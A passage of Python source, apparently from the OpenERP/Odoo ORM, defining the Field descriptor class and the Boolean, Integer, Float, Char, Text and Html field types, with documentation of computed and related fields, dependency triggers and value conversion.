                    bucket.append((attr[len(prefix):], attr))
                    break


class Field(object):
    """ The field descriptor contains the field definition, and manages accesses
        and assignments of the corresponding field on records. The following
        attributes may be provided when instantiating a field:

        :param string: the label of the field seen by users (string); if not
            set, the ORM takes the field name in the class (capitalized).

        :param help: the tooltip of the field seen by users (string)

        :param readonly: whether the field is readonly (boolean, by default ``False``)

        :param required: whether the value of the field is required (boolean, by
            default ``False``)

        :param index: whether the field is indexed in database (boolean, by
            default ``False``)

        :param default: the default value for the field; this is either a static
            value, or a function taking a recordset and returning a value

        :param states: a dictionary mapping state values to lists of UI attribute-value
            pairs; possible attributes are: 'readonly', 'required', 'invisible'.
            Note: Any state-based condition requires the ``state`` field value to be
            available on the client-side UI. This is typically done by including it in
            the relevant views, possibly made invisible if not relevant for the
            end-user.

        :param groups: comma-separated list of group xml ids (string); this
            restricts the field access to the users of the given groups only

        :param bool copy: whether the field value should be copied when the record
            is duplicated (default: ``True`` for normal fields, ``False`` for
            ``one2many`` and computed fields, including property fields and
            related fields)

        :param string oldname: the previous name of this field, so that ORM can rename
            it automatically at migration

        .. _field-computed:

        .. rubric:: Computed fields

        One can define a field whose value is computed instead of simply being
        read from the database. The attributes that are specific to computed
        fields are given below. To define such a field, simply provide a value
        for the attribute ``compute``.

        :param compute: name of a method that computes the field

        :param inverse: name of a method that inverses the field (optional)

        :param search: name of a method that implements search on the field (optional)

        :param store: whether the field is stored in database (boolean, by
            default ``False`` on computed fields)

        :param compute_sudo: whether the field should be recomputed as superuser
            to bypass access rights (boolean, by default ``False``)

        The methods given for ``compute``, ``inverse`` and ``search`` are model
        methods. Their signature is shown in the following example::

            upper = fields.Char(compute='_compute_upper',
                                inverse='_inverse_upper',
                                search='_search_upper')

            @api.depends('name')
            def _compute_upper(self):
                for rec in self:
                    rec.upper = rec.name.upper() if rec.name else False

            def _inverse_upper(self):
                for rec in self:
                    rec.name = rec.upper.lower() if rec.upper else False

            def _search_upper(self, operator, value):
                if operator == 'like':
                    operator = 'ilike'
                return [('name', operator, value)]

        The compute method has to assign the field on all records of the invoked
        recordset. The decorator :meth:`openerp.api.depends` must be applied on
        the compute method to specify the field dependencies; those dependencies
        are used to determine when to recompute the field; recomputation is
        automatic and guarantees cache/database consistency. Note that the same
        method can be used for several fields, you simply have to assign all the
        given fields in the method; the method will be invoked once for all
        those fields.

        By default, a computed field is not stored to the database, and is
        computed on-the-fly. Adding the attribute ``store=True`` will store the
        field's values in the database. The advantage of a stored field is that
        searching on that field is done by the database itself. The disadvantage
        is that it requires database updates when the field must be recomputed.

        The inverse method, as its name says, does the inverse of the compute
        method: the invoked records have a value for the field, and you must
        apply the necessary changes on the field dependencies such that the
        computation gives the expected value. Note that a computed field without
        an inverse method is readonly by default.

        The search method is invoked when processing domains before doing an
        actual search on the model. It must return a domain equivalent to the
        condition: ``field operator value``.

        .. _field-related:

        .. rubric:: Related fields

        The value of a related field is given by following a sequence of
        relational fields and reading a field on the reached model. The complete
        sequence of fields to traverse is specified by the attribute

        :param related: sequence of field names

        Some field attributes are automatically copied from the source field if
        they are not redefined: ``string``, ``help``, ``readonly``, ``required`` (only
        if all fields in the sequence are required), ``groups``, ``digits``, ``size``,
        ``translate``, ``sanitize``, ``selection``, ``comodel_name``, ``domain``,
        ``context``. All semantic-free attributes are copied from the source
        field.

        By default, the values of related fields are not stored to the database.
        Add the attribute ``store=True`` to make it stored, just like computed
        fields. Related fields are automatically recomputed when their
        dependencies are modified.

        .. _field-company-dependent:

        .. rubric:: Company-dependent fields

        Formerly known as 'property' fields, the value of those fields depends
        on the company. In other words, users that belong to different companies
        may see different values for the field on a given record.

        :param company_dependent: whether the field is company-dependent (boolean)

        .. _field-incremental-definition:

        .. rubric:: Incremental definition

        A field is defined as class attribute on a model class. If the model
        is extended (see :class:`~openerp.models.Model`), one can also extend
        the field definition by redefining a field with the same name and same
        type on the subclass. In that case, the attributes of the field are
        taken from the parent class and overridden by the ones given in
        subclasses.

        For instance, the second class below only adds a tooltip on the field
        ``state``::

            class First(models.Model):
                _name = 'foo'
                state = fields.Selection([...], required=True)

            class Second(models.Model):
                _inherit = 'foo'
                state = fields.Selection(help="Blah blah blah")

    """
    __metaclass__ = MetaField

    type = None                         # type of the field (string)
    relational = False                  # whether the field is a relational one

    # default values for every slot declared on Field; MetaField turns the
    # keys into ``__slots__`` entries, and set_class_name() assigns the values
    _slots = {
        '_attrs': EMPTY_DICT,           # dictionary of field attributes; it contains:
                                        #  - all attributes after __init__()
                                        #  - free attributes only after set_class_name()

        'automatic': False,             # whether the field is automatically created ("magic" field)
        'inherited': False,             # whether the field is inherited (_inherits)
        'column': None,                 # the column corresponding to the field
        'setup_done': False,            # whether the field has been set up

        'name': None,                   # name of the field
        'model_name': None,             # name of the model of this field
        'comodel_name': None,           # name of the model of values (if relational)

        'store': True,                  # whether the field is stored in database
        'index': False,                 # whether the field is indexed in database
        'manual': False,                # whether the field is a custom field
        'copy': True,                   # whether the field is copied over by BaseModel.copy()
        'depends': (),                  # collection of field dependencies
        'recursive': False,             # whether self depends on itself
        'compute': None,                # compute(recs) computes field on recs
        'compute_sudo': False,          # whether field should be recomputed as admin
        'inverse': None,                # inverse(recs) inverses field on recs
        'search': None,                 # search(recs, operator, value) searches on self
        'related': None,                # sequence of field names, for related fields
        'related_sudo': True,           # whether related fields should be read as admin
        'company_dependent': False,     # whether ``self`` is company-dependent (property field)
        'default': None,                # default(recs) returns the default value

        'string': None,                 # field label
        'help': None,                   # field tooltip
        'readonly': False,              # whether the field is readonly
        'required': False,              # whether the field is required
        'states': None,                 # set readonly and required depending on state
        'groups': None,                 # csv list of group xml ids
        'change_default': False,        # whether the field may trigger a "user-onchange"
        'deprecated': None,             # whether the field is deprecated

        'inverse_fields': (),           # collection of inverse fields (objects)
        'computed_fields': (),          # fields computed with the same method as self
        'related_field': None,          # corresponding related field
        '_triggers': (),                # invalidation and recomputation triggers
    }

    def __init__(self, string=None, **kwargs):
        """ Initialize the field; ``string`` is the user-visible label and any
            other keyword argument becomes a field attribute.  ``None`` values
            are dropped so that the defaults declared in ``_slots`` apply.
        """
        kwargs['string'] = string
        attrs = {key: val for key, val in kwargs.iteritems() if val is not None}
        self._attrs = attrs or EMPTY_DICT

    def __getattr__(self, name):
        """ Access non-slot field attribute. """
        # only reached when ``name`` is not a slot; look it up in _attrs
        attrs = self._attrs
        if name in attrs:
            return attrs[name]
        raise AttributeError(name)

    def __setattr__(self, name, value):
        """ Set slot or non-slot field attribute. """
        try:
            object.__setattr__(self, name, value)
        except AttributeError:
            # ``name`` is not a slot: store it in _attrs instead; the shared
            # immutable EMPTY_DICT must first be swapped for a private dict
            if self._attrs:
                self._attrs[name] = value
            else:
                self._attrs = {name: value}     # replace EMPTY_DICT

    def __delattr__(self, name):
        """ Remove non-slot field attribute. """
        # only free attributes stored in _attrs can be removed; slot
        # attributes always keep a value
        try:
            del self._attrs[name]
        except KeyError:
            raise AttributeError(name)

    def new(self, **kwargs):
        """ Return a field of the same type as ``self``, with its own parameters. """
        field_class = type(self)
        return field_class(**kwargs)

    def set_class_name(self, cls, name):
        """ Assign the model class and field name of ``self``. """
        # keep the attributes given at construction time; the slot defaults
        # assigned just below would otherwise shadow them
        self_attrs = self._attrs
        for attr, value in self._slots.iteritems():
            setattr(self, attr, value)

        self.model_name = cls._name
        self.name = name

        # determine all inherited field attributes
        attrs = {}
        for field in resolve_all_mro(cls, name, reverse=True):
            if isinstance(field, type(self)):
                attrs.update(field._attrs)
            else:
                # a field of another type interrupts the inheritance chain
                attrs.clear()
        attrs.update(self_attrs)        # necessary in case self is not in cls

        # initialize ``self`` with ``attrs``
        if attrs.get('compute'):
            # by default, computed fields are not stored, not copied and readonly
            attrs['store'] = attrs.get('store', False)
            attrs['copy'] = attrs.get('copy', False)
            attrs['readonly'] = attrs.get('readonly', not attrs.get('inverse'))
        if attrs.get('related'):
            # by default, related fields are not stored and not copied
            attrs['store'] = attrs.get('store', False)
            attrs['copy'] = attrs.get('copy', False)

        # fix for function fields overridden by regular columns
        if not isinstance(attrs.get('column'), (NoneType, fields.function)):
            attrs.pop('store', None)

        for attr, value in attrs.iteritems():
            setattr(self, attr, value)

        if not self.string and not self.related:
            # related fields get their string from their parent field
            self.string = name.replace('_', ' ').capitalize()

        # determine self.default and cls._defaults in a consistent way
        self._determine_default(cls, name)

    def _determine_default(self, cls, name):
        """ Retrieve the default value for ``self`` in the hierarchy of ``cls``, and
            determine ``self.default`` and ``cls._defaults`` accordingly.
        """
        self.default = None

        # traverse the class hierarchy upwards, and take the first field
        # definition with a default or _defaults for self
        for klass in cls.__mro__:
            if name in klass.__dict__:
                field = klass.__dict__[name]
                if not isinstance(field, type(self)):
                    # klass contains another value overridden by self
                    return

                if 'default' in field._attrs:
                    # take the default in field, and adapt it for cls._defaults
                    value = field._attrs['default']
                    if callable(value):
                        # local import to avoid a circular dependency
                        from openerp import api
                        self.default = value
                        cls._defaults[name] = api.model(
                            lambda recs: self.convert_to_write(value(recs))
                        )
                    else:
                        self.default = lambda recs: value
                        cls._defaults[name] = value
                    return

            # old-API defaults declared in a ``_defaults`` dict on the class
            defaults = klass.__dict__.get('_defaults') or {}
            if name in defaults:
                # take the value from _defaults, and adapt it for self.default
                value = defaults[name]
                if callable(value):
                    # old-API callables expect (model, cr, uid, context)
                    func = lambda recs: value(recs._model, recs._cr, recs._uid, recs._context)
                else:
                    func = lambda recs: value
                self.default = lambda recs: self.convert_to_cache(
                    func(recs), recs, validate=False,
                )
                cls._defaults[name] = value
                return

    def __str__(self):
        # fully-qualified field name: "<model>.<field>"
        return "{}.{}".format(self.model_name, self.name)

    def __repr__(self):
        # same rendering as __str__: "<model>.<field>"
        return "{}.{}".format(self.model_name, self.name)

    ############################################################################
    #
    # Field setup
    #

    def setup(self, env):
        """ Make sure that ``self`` is set up, except for recomputation triggers. """
        if self.setup_done:
            return
        if self.related:
            self._setup_related(env)
        else:
            self._setup_regular(env)
        self.setup_done = True

    #
    # Setup of non-related fields
    #

    def _setup_regular(self, env):
        """ Setup the attributes of a non-related field. """
        recs = env[self.model_name]

        def make_depends(deps):
            # ``deps`` may be a callable computing the dependencies on the model
            return tuple(deps(recs) if callable(deps) else deps)

        # convert compute into a callable and determine depends
        if isinstance(self.compute, basestring):
            # if the compute method has been overridden, concatenate all their _depends
            self.depends = ()
            for method in resolve_all_mro(type(recs), self.compute, reverse=True):
                self.depends += make_depends(getattr(method, '_depends', ()))
            self.compute = getattr(type(recs), self.compute)
        else:
            self.depends = make_depends(getattr(self.compute, '_depends', ()))

        # convert inverse and search into callables
        if isinstance(self.inverse, basestring):
            self.inverse = getattr(type(recs), self.inverse)
        if isinstance(self.search, basestring):
            self.search = getattr(type(recs), self.search)

    #
    # Setup of related fields
    #

    def _setup_related(self, env):
        """ Setup the attributes of a related field. """
        # fix the type of self.related if necessary
        if isinstance(self.related, basestring):
            self.related = tuple(self.related.split('.'))

        # determine the chain of fields, and make sure they are all set up
        recs = env[self.model_name]
        fields = []
        for name in self.related:
            field = recs._fields[name]
            field.setup(env)
            recs = recs[name]
            fields.append(field)

        # the last field of the chain is the source of the related value
        self.related_field = field

        # check type consistency
        if self.type != field.type:
            raise Warning("Type of related field %s is inconsistent with %s" % (self, field))

        # determine dependencies, compute, inverse, and search
        self.depends = ('.'.join(self.related),)
        self.compute = self._compute_related
        if not (self.readonly or field.readonly):
            self.inverse = self._inverse_related
        if field._description_searchable:
            # allow searching on self only if the related field is searchable
            self.search = self._search_related

        # copy attributes from field to self (string, help, etc.)
        for attr, prop in self.related_attrs:
            if not getattr(self, attr):
                setattr(self, attr, getattr(field, prop))

        # also copy the source field's free-form attributes
        for attr, value in field._attrs.iteritems():
            if attr not in self._attrs:
                setattr(self, attr, value)

        # special case for states: copy it only for inherited fields
        if not self.states and self.inherited:
            self.states = field.states

        # special case for required: check if all fields are required
        if not self.store and not self.required:
            self.required = all(field.required for field in fields)

    def _compute_related(self, records):
        """ Compute the related field ``self`` on ``records``.

            The value is read by following the ``related`` chain of field
            names from each record to the source field.
        """
        # when related_sudo, bypass access rights checks when reading values
        others = records.sudo() if self.related_sudo else records
        for record, other in zip(records, others):
            if not record.id:
                # draft record, do not switch to another environment
                other = record
            # traverse the intermediate fields; follow the first record at each step
            for name in self.related[:-1]:
                other = other[name][:1]
            record[self.name] = other[self.related[-1]]

    def _inverse_related(self, records):
        """ Inverse the related field ``self`` on ``records``. """
        # store record values, otherwise they may be lost by cache invalidation!
        record_value = {record: record[self.name] for record in records}
        for record in records:
            other = record
            # traverse the intermediate fields, and keep at most one record
            for name in self.related[:-1]:
                other = other[name][:1]
            if other:
                # write the value on the final field of the chain
                other[self.related[-1]] = record_value[record]

    def _search_related(self, records, operator, value):
        """ Determine the domain to search on field ``self``. """
        dotted_name = '.'.join(self.related)
        return [(dotted_name, operator, value)]

    # properties used by _setup_related() to copy values from related field;
    # each ``_related_<attr>`` property reads ``<attr>`` on the source field
    _related_comodel_name = property(attrgetter('comodel_name'))
    _related_string = property(attrgetter('string'))
    _related_help = property(attrgetter('help'))
    _related_readonly = property(attrgetter('readonly'))
    _related_groups = property(attrgetter('groups'))

    @property
    def base_field(self):
        """ Return the base field of an inherited field, or ``self``. """
        if self.inherited:
            return self.related_field.base_field
        return self

    #
    # Setup of field triggers
    #
    # The triggers is a collection of pairs (field, path) of computed fields
    # that depend on ``self``. When ``self`` is modified, it invalidates the cache
    # of each ``field``, and registers the records to recompute based on ``path``.
    # See method ``modified`` below for details.
    #

    def add_trigger(self, trigger):
        """ Add a recomputation trigger on ``self``. """
        # _triggers is an immutable tuple, so extend it by rebinding
        if trigger not in self._triggers:
            self._triggers = self._triggers + (trigger,)

    def setup_triggers(self, env):
        """ Add the necessary triggers to invalidate/recompute ``self``. """
        model = env[self.model_name]
        for dotted_path in self.depends:
            self._setup_dependency([], model, dotted_path.split('.'))

    def _setup_dependency(self, path0, model, path1):
        """ Make ``self`` depend on ``model``; `path0 + path1` is a dependency of
            ``self``, and ``path0`` is the sequence of field names from ``self.model``
            to ``model``.  ``path1`` is the remaining part of the dependency
            path, processed one field name at a time.
        """
        env = model.env
        head, tail = path1[0], path1[1:]

        if head == '*':
            # special case: add triggers on all fields of model (except self)
            fields = set(model._fields.itervalues()) - set([self])
        else:
            fields = [model._fields[head]]

        for field in fields:
            if field == self:
                _logger.debug("Field %s is recursively defined", self)
                self.recursive = True
                continue

            #_logger.debug("Add trigger on %s to recompute %s", field, self)
            field.add_trigger((self, '.'.join(path0 or ['id'])))

            # add trigger on inverse fields, too
            for invf in field.inverse_fields:
                #_logger.debug("Add trigger on %s to recompute %s", invf, self)
                invf.add_trigger((self, '.'.join(path0 + [head])))

            # recursively traverse the dependency
            if tail:
                comodel = env[field.comodel_name]
                self._setup_dependency(path0 + [head], comodel, tail)

    @property
    def dependents(self):
        """ Return the computed fields that depend on ``self``. """
        return (field for field, _path in self._triggers)

    ############################################################################
    #
    # Field description
    #

    def get_description(self, env):
        """ Return a dictionary that describes the field ``self``. """
        description = {'type': self.type}
        for key, prop_name in self.description_attrs:
            val = getattr(self, prop_name)
            # some descriptions are methods taking the environment
            if callable(val):
                val = val(env)
            if val is not None:
                description[key] = val
        return description

    # properties used by get_description(); each ``_description_<attr>``
    # property exposes ``<attr>`` in the field's description dictionary
    _description_store = property(attrgetter('store'))
    _description_manual = property(attrgetter('manual'))
    _description_depends = property(attrgetter('depends'))
    _description_related = property(attrgetter('related'))
    _description_company_dependent = property(attrgetter('company_dependent'))
    _description_readonly = property(attrgetter('readonly'))
    _description_required = property(attrgetter('required'))
    _description_states = property(attrgetter('states'))
    _description_groups = property(attrgetter('groups'))
    _description_change_default = property(attrgetter('change_default'))
    _description_deprecated = property(attrgetter('deprecated'))

    @property
    def _description_searchable(self):
        # searchable if stored, if a search method is given, or if the
        # old-API column provides a search function
        searchable = self.store or self.search or (self.column and self.column._fnct_search)
        return bool(searchable)

    @property
    def _description_sortable(self):
        # sortable if stored, or inherited from a sortable parent field
        return self.store or (self.inherited and self.related_field._description_sortable)

    def _description_string(self, env):
        """ Return the field label, translated when a language is active. """
        if not (self.string and env.lang):
            return self.string
        # translations are keyed on the base field, not the inherited one
        source = self.base_field
        source_name = "%s,%s" % (source.model_name, source.name)
        translated = env['ir.translation']._get_source(source_name, 'field', env.lang)
        return translated or self.string

    def _description_help(self, env):
        """ Return the field tooltip, translated when a language is active. """
        if not (self.help and env.lang):
            return self.help
        source_name = "%s,%s" % (self.model_name, self.name)
        translated = env['ir.translation']._get_source(source_name, 'help', env.lang)
        return translated or self.help

    ############################################################################
    #
    # Conversion to column instance
    #

    def to_column(self):
        """ Return a column object corresponding to ``self``, or ``None``.

            The result is also stored in ``self.column``.
        """
        if not self.store and self.compute:
            # non-stored computed fields do not have a corresponding column
            self.column = None
            return None

        # determine column parameters
        #_logger.debug("Create fields._column for Field %s", self)
        args = {}
        for attr, prop in self.column_attrs:
            args[attr] = getattr(self, prop)
        for attr, value in self._attrs.iteritems():
            args[attr] = value

        if self.company_dependent:
            # company-dependent fields are mapped to former property fields
            args['type'] = self.type
            args['relation'] = self.comodel_name
            self.column = fields.property(**args)
        elif self.column:
            # let the column provide a valid column for the given parameters
            self.column = self.column.new(_computed_field=bool(self.compute), **args)
        else:
            # create a fresh new column of the right type
            self.column = getattr(fields, self.type)(**args)

        return self.column

    # properties used by to_column() to create a column instance; each
    # ``_column_<attr>`` property supplies the column's ``<attr>`` parameter
    _column_copy = property(attrgetter('copy'))
    _column_select = property(attrgetter('index'))
    _column_manual = property(attrgetter('manual'))
    _column_string = property(attrgetter('string'))
    _column_help = property(attrgetter('help'))
    _column_readonly = property(attrgetter('readonly'))
    _column_required = property(attrgetter('required'))
    _column_states = property(attrgetter('states'))
    _column_groups = property(attrgetter('groups'))
    _column_change_default = property(attrgetter('change_default'))
    _column_deprecated = property(attrgetter('deprecated'))

    ############################################################################
    #
    # Conversion of values
    #

    def null(self, env):
        """ Return the null value for this field in the given environment.

            Subclasses may override this; the base implementation uses ``False``.
        """
        return False

    def convert_to_cache(self, value, record, validate=True):
        """ convert ``value`` to the cache level in ``env``; ``value`` may come from
            an assignment, or have the format of methods :meth:`BaseModel.read`
            or :meth:`BaseModel.write`

            :param record: the target record for the assignment, or an empty recordset

            :param bool validate: when True, field-specific validation of
                ``value`` will be performed

            The base implementation returns ``value`` unchanged; subclasses
            override it with type-specific conversions.
        """
        return value

    def convert_to_read(self, value, use_name_get=True):
        """ Convert ``value`` from the cache into the value returned by
            :meth:`BaseModel.read`.

            :param bool use_name_get: when True, the display name of the value
                is computed with :meth:`BaseModel.name_get`, if relevant for
                the field
        """
        # None is not a valid read value; degrade it to False
        if value is None:
            return False
        return value

    def convert_to_write(self, value, target=None, fnames=None):
        """ Convert ``value`` from the cache into a valid value for
            :meth:`BaseModel.write`.

            :param target: optional, the record to be modified with this value
            :param fnames: for relational fields only, an optional collection
                of field names to convert
        """
        # by default, the write format coincides with the read format
        result = self.convert_to_read(value)
        return result

    def convert_to_onchange(self, value):
        """ Convert ``value`` from the cache into a valid value for a v7
            onchange method.
        """
        # by default, onchange uses the same format as write
        result = self.convert_to_write(value)
        return result

    def convert_to_export(self, value, env):
        """ Convert ``value`` from the cache into a valid value for export.
            The parameter ``env`` is given for managing translations.
        """
        if not value:
            return ''
        if env.context.get('export_raw_data'):
            # raw export keeps the cached value untouched
            return value
        return ustr(value)

    def convert_to_display_name(self, value, record=None):
        """ convert ``value`` from the cache to a suitable display name. """
        # default: the unicode representation of the cached value
        return ustr(value)

    ############################################################################
    #
    # Descriptor methods
    #

    def __get__(self, record, owner):
        """ Return the value of field ``self`` on ``record`` (descriptor
            protocol).  The value is served from the record's cache when
            present; on a cache miss it is first determined (read or computed)
            and stored in the cache.
        """
        if record is None:
            return self         # the field is accessed through the owner class

        if not record:
            # null record -> return the null value for this field
            return self.null(record.env)

        # only a single record may be accessed
        record.ensure_one()

        try:
            return record._cache[self]
        except KeyError:
            pass

        # cache miss, retrieve value
        if record.id:
            # normal record -> read or compute value for this field
            self.determine_value(record)
        else:
            # draft record -> compute the value or let it be null
            self.determine_draft_value(record)

        # the result should be in cache now
        return record._cache[self]

    def __set__(self, record, value):
        """ Set the value of field ``self`` on ``record`` (descriptor
            protocol).  In draft mode the assignment only touches the cache
            (and marks dependents invalid); otherwise it is written through
            to the database.
        """
        env = record.env

        # only a single record may be updated
        record.ensure_one()

        # adapt value to the cache level
        value = self.convert_to_cache(value, record)

        if env.in_draft or not record.id:
            # determine dependent fields
            spec = self.modified_draft(record)

            # set value in cache, inverse field, and mark record as dirty
            record._cache[self] = value
            if env.in_onchange:
                for invf in self.inverse_fields:
                    # note argument order: the records updated are ``value``,
                    # and the value assigned to them is ``record``
                    invf._update(value, record)
                record._set_dirty(self.name)

            # determine more dependent fields, and invalidate them
            if self.relational:
                spec += self.modified_draft(record)
            env.invalidate(spec)

        else:
            # simply write to the database, and update cache
            record.write({self.name: self.convert_to_write(value)})
            record._cache[self] = value

    ############################################################################
    #
    # Computation of field values
    #

    def _compute_value(self, records):
        """ Invoke the compute method on ``records``.  All fields computed by
            the same method (``self.computed_fields``) are initialized to
            their null value first, and flagged in ``env.computed`` for the
            duration of the computation (``modified_draft`` uses that set to
            exclude them from invalidation).
        """
        # initialize the fields to their corresponding null value in cache
        for field in self.computed_fields:
            records._cache[field] = field.null(records.env)
            records.env.computed[field].update(records._ids)
        self.compute(records)
        for field in self.computed_fields:
            records.env.computed[field].difference_update(records._ids)

    def compute_value(self, records):
        """ Invoke the compute method on ``records``; the results are in cache.

            Computation is attempted in batch first; if some record is
            forbidden or missing, it falls back to record-by-record
            computation, caching a :class:`FailedValue` for the failing ones.
        """
        with records.env.do_in_draft():
            try:
                self._compute_value(records)
            except (AccessError, MissingError):
                # some record is forbidden or missing, retry record by record
                for record in records:
                    try:
                        self._compute_value(record)
                    except Exception as exc:
                        # bug fix: the record cache is indexed by field
                        # objects everywhere else (see __get__/__set__);
                        # keying with self.name stored the FailedValue under
                        # a string key, so later reads of record._cache[self]
                        # never surfaced the failure
                        record._cache[self] = FailedValue(exc)

    def determine_value(self, record):
        """ Determine the value of ``self`` for ``record`` and put it in the
            record's cache (stored fields are read/recomputed, non-stored
            computed fields are computed, plain non-stored fields get their
            null value).
        """
        env = record.env

        if self.column and not (self.depends and env.in_draft):
            # this is a stored field or an old-style function field
            if self.depends:
                # this is a stored computed field, check for recomputation
                recs = record._recompute_check(self)
                if recs:
                    # recompute the value (only in cache)
                    self.compute_value(recs)
                    # HACK: if result is in the wrong cache, copy values
                    if recs.env != env:
                        for source, target in zip(recs, recs.with_env(env)):
                            try:
                                values = target._convert_to_cache({
                                    f.name: source[f.name] for f in self.computed_fields
                                }, validate=False)
                            except MissingError as e:
                                values = FailedValue(e)
                            target._cache.update(values)
                    # the result is saved to database by BaseModel.recompute()
                    return

            # read the field from database
            record._prefetch_field(self)

        elif self.compute:
            # this is either a non-stored computed field, or a stored computed
            # field in draft mode
            if self.recursive:
                # recursive field: compute on this record alone, no batching
                self.compute_value(record)
            else:
                # batch with the cached records that also miss this field
                recs = record._in_cache_without(self)
                self.compute_value(recs)

        else:
            # this is a non-stored non-computed field
            record._cache[self] = self.null(env)

    def determine_draft_value(self, record):
        """ Determine the value of ``self`` for the given draft ``record``. """
        if not self.compute:
            # no compute method: mark the cache with a special null value
            record._cache[self] = SpecialValue(self.null(record.env))
            return
        # evaluate the compute method directly into the cache
        self._compute_value(record)

    def determine_inverse(self, records):
        """ Given the value of ``self`` on ``records``, inverse the computation. """
        inverse = self.inverse
        if inverse:
            inverse(records)

    def determine_domain(self, records, operator, value):
        """ Return a domain representing a condition on ``self``. """
        if not self.search:
            # default: a plain domain leaf on the field itself
            return [(self.name, operator, value)]
        # delegate to the field's search method
        return self.search(records, operator, value)

    ############################################################################
    #
    # Notification when fields are modified
    #

    def modified(self, records):
        """ Notify that field ``self`` has been modified on ``records``: prepare the
            fields/records to recompute, and return a spec indicating what to
            invalidate.

            The spec is a list of pairs ``(field, ids_or_None)``; ``None``
            means "invalidate the field on all records".
        """
        # invalidate the fields that depend on self, and prepare recomputation
        spec = [(self, records._ids)]
        for field, path in self._triggers:
            if path and field.store:
                # don't move this line to function top, see log
                env = records.env(user=SUPERUSER_ID, context={'active_test': False})
                target = env[field.model_name].search([(path, 'in', records.ids)])
                if target:
                    spec.append((field, target._ids))
                    # recompute field on target in the environment of records,
                    # and as user admin if required
                    if field.compute_sudo:
                        target = target.with_env(records.env(user=SUPERUSER_ID))
                    else:
                        target = target.with_env(records.env)
                    target._recompute_todo(field)
            else:
                # non-stored dependent field: invalidate it on all records
                spec.append((field, None))

        return spec

    def modified_draft(self, records):
        """ Same as :meth:`modified`, but in draft mode: only records already
            in cache are considered, and records whose field is currently
            being computed are excluded.
        """
        env = records.env

        # invalidate the fields on the records in cache that depend on
        # ``records``, except fields currently being computed
        spec = []
        for field, path in self._triggers:
            target = env[field.model_name]
            # records on which ``field`` is being computed right now
            computed = target.browse(env.computed[field])
            if path == 'id':
                # the dependency is on the records themselves
                target = records - computed
            elif path:
                # keep cached records whose ``path`` reaches ``records``
                target = (target.browse(env.cache[field]) - computed).filtered(
                    lambda rec: rec._mapped_cache(path) & records
                )
            else:
                target = target.browse(env.cache[field]) - computed

            if target:
                spec.append((field, target._ids))

        return spec


class Boolean(Field):
    """ Boolean field; cached values are reduced to plain ``bool``. """
    type = 'boolean'

    def convert_to_cache(self, value, record, validate=True):
        # any input is reduced to its truth value
        return True if value else False

    def convert_to_export(self, value, env):
        # raw export keeps the boolean; otherwise render it as a string
        if not env.context.get('export_raw_data'):
            return ustr(value)
        return value


class Integer(Field):
    """ Integer field. """
    type = 'integer'
    _slots = {
        'group_operator': None,         # operator for aggregating values
        'group_expression': None,       # advance expression for aggregating values
    }

    # expose the aggregation attributes to related fields and columns
    _related_group_operator = property(attrgetter('group_operator'))
    _column_group_operator = property(attrgetter('group_operator'))
    _related_group_expression = property(attrgetter('group_expression'))
    _column_group_expression = property(attrgetter('group_expression'))

    def convert_to_cache(self, value, record, validate=True):
        if isinstance(value, dict):
            # special case, when an integer field is used as inverse for a one2many
            return value.get('id', False)
        return int(value) if value else 0

    def convert_to_read(self, value, use_name_get=True):
        # integers beyond 2^31-1 cannot be marshalled over pure XMLRPC,
        # so they are degraded to floats :-(
        return float(value) if value and value > xmlrpclib.MAXINT else value

    def _update(self, records, value):
        # special case, when an integer field is used as inverse for a one2many:
        # cache the id of the assigned record
        records._cache[self] = value.id or 0

    def convert_to_export(self, value, env):
        if not value and value != 0:
            return ''
        if env.context.get('export_raw_data'):
            return value
        return ustr(value)


class Float(Field):
    """ Floating-point field.

    :param digits: a pair (total, decimal), or a function taking a database
                   cursor and returning a pair (total, decimal)
    """
    type = 'float'
    _slots = {
        '_digits': None,                # digits argument passed to class initializer
        'group_operator': None,         # operator for aggregating values
        'group_expression': None,       # advance expression for aggregating values
    }

    def __init__(self, string=None, digits=None, **kwargs):
        # keep the raw digits argument; it may be a pair or a callable
        super(Float, self).__init__(string=string, _digits=digits, **kwargs)

    @property
    def digits(self):
        """ Effective (total, decimal) pair; a callable ``digits`` argument
            is evaluated against a fresh cursor.
        """
        digits = self._digits
        if not callable(digits):
            return digits
        with fields._get_cursor() as cr:
            return digits(cr)

    def _setup_digits(self, env):
        """ Setup the digits for ``self`` and its corresponding column """
        pass

    def _setup_regular(self, env):
        super(Float, self)._setup_regular(env)
        self._setup_digits(env)

    _related__digits = property(attrgetter('_digits'))
    _related_group_operator = property(attrgetter('group_operator'))
    _related_group_expression = property(attrgetter('group_expression'))

    _description_digits = property(attrgetter('digits'))

    _column_digits = property(lambda self: not callable(self._digits) and self._digits)
    _column_digits_compute = property(lambda self: callable(self._digits) and self._digits)
    _column_group_operator = property(attrgetter('group_operator'))
    _column_group_expression = property(attrgetter('group_expression'))

    def convert_to_cache(self, value, record, validate=True):
        # round before caching, otherwise the cached value may differ from
        # what would be stored in the database
        value = float(value or 0.0)
        digits = self.digits
        if not digits:
            return value
        return float_round(value, precision_digits=digits[1])

    def convert_to_export(self, value, env):
        if not value and value != 0.0:
            return ''
        if env.context.get('export_raw_data'):
            return value
        return ustr(value)


class _String(Field):
    """ Abstract base class for string-like fields. """
    _slots = {
        'translate': False,             # whether the field is translated
    }

    # expose the ``translate`` flag to the column, related-field and
    # field-description machinery
    _column_translate = property(attrgetter('translate'))
    _related_translate = property(attrgetter('translate'))
    _description_translate = property(attrgetter('translate'))

class Char(_String):
    """ Single-line string field, optionally length-limited.

    :param int size: the maximum size of values stored for that field
    :param bool translate: whether the values of this field can be translated
    """
    type = 'char'
    _slots = {
        'size': None,                   # maximum size of values (deprecated)
    }

    _column_size = property(attrgetter('size'))
    _related_size = property(attrgetter('size'))
    _description_size = property(attrgetter('size'))

    def _setup_regular(self, env):
        super(Char, self)._setup_regular(env)
        assert isinstance(self.size, (NoneType, int)), \
            "Char field %s with non-integer size %r" % (self, self.size)

    def convert_to_cache(self, value, record, validate=True):
        # both None and False denote the absence of a value
        if value is False or value is None:
            return False
        # truncate to the declared size (a [:None] slice is a no-op)
        return ustr(value)[:self.size]

class Text(_String):
    """ Like :class:`Char`, but intended for longer, multi-line contents;
    has no size limit.

    :param translate: whether the value of this field can be translated
    """
    type = 'text'

    def convert_to_cache(self, value, record, validate=True):
        # both None and False denote the absence of a value
        if value is False or value is None:
            return False
        return ustr(value)

class Html(_String):
    """ String field for HTML content; values may be sanitized on the way
    into the cache.
    """
    type = 'html'
    _slots = {
        'sanitize': True,               # whether value must be sanitized
        'strip_style': False,           # whether to strip style attributes
    }

    _column_sanitize = property(attrgetter('sanitize'))
